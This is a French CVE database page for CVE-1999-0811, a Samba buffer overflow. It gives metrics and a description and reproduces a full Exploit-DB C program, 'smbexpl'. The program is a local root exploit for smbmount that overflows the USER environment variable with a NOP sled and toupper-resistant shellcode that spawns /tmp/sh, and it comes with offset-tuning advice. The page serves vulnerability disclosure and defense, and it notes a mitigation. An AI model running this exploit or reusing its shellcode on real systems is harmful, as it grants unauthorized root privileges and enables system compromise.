CVE-1999-0811 : Détail

CVE-1999-0811

0.24%V3
Network
2000-01-18
04h00 +00:00
2024-08-01
16h48 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in Samba smbd program via a malformed message command.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 19428

Date de publication : 1999-07-20 22h00 +00:00
Auteur : Gerald Britton
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/536/info There were a number of vulnerabilities in the Samba package pre-2.0.5. The first is a possible denial of service in nmbd (the netbios name service daemon), which resulted in nmbd spinning until killed. The second vulnerability known is a possible buffer overflow problem in smbd which is not exploit in the default install/configuration. A function in the messaging system could be exploited and arbitrary code executed as root if the "message command" was set in smb.conf. There was also a race condition vulnerability which could possible allow an attacker to mount arbitrary points in the filesystem if smbmnt was setuid root (which it is not by default). */ /* The default parameters to the program often work, however I have found that the offset parameter sometimes varies wildly, values between -600 and -100 usually work though, a quick shell script will scan through these. */ /* ** smbexpl -- a smbmount root exploit under Linux ** ** Author: Gerald Britton <gbritton@nih.gov> ** ** This code exploits a buffer overflow in smbmount from smbfs-2.0.1. ** The code does not do range checking when copying a username from ** the environment variables USER or LOGNAME. To get this far into ** the code we need to execute with dummy arguments of a server and a ** mountpoint to use (./a in this case). The user will need to create ** the ./a directory and then execute smbexpl to gain root. This code ** is also setup to use /tmp/sh as the shell as bash-2.01 appears to ** do a seteuid(getuid()) so /bin/sh on my system won't work. Finally ** a "-Q" (an invalid commandline argument) causes smbmount to fail when ** parsing args and terminate, thus jumping into our shellcode. ** ** The shellcode used in this program also needed to be specialized as ** smbmount toupper()'s the contents of the USER variable. Self modifying ** code was needed to ensure that the shellcode will survive toupper(). ** ** The quick fix for the security problem: ** chmod -s /sbin/smbmount ** ** A better fix would be to patch smbmount to do bounds checking when ** copying the contents of the USER and LOGNAME variables. ** */ #include <stdlib.h> #include <stdio.h> #define DEFAULT_OFFSET -202 #define DEFAULT_BUFFER_SIZE 211 #define DEFAULT_ALIGNMENT 2 #define NOP 0x90 /* This shell code is designed to survive being filtered by toupper() */ char shellcode[] = "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40" "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20" "\xeb\x05\xe8\xdb\xff\xff\xff" "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int alignment=DEFAULT_ALIGNMENT; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (argc > 3) alignment = atoi(argv[3]); printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; fprintf(stderr,"Using address: 0x%x\n", addr); ptr = buff; addr_ptr = (long *) (ptr+alignment); for (i = 0; i < bsize-alignment; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + (128 - strlen(shellcode)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; setenv("USER",buff,1); execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0); }

Products Mentioned

Configuraton 0

Samba>>Samba >> Version 2.0.4

Références

http://www.securityfocus.com/bid/536
Tags : vdb-entry, x_refsource_BID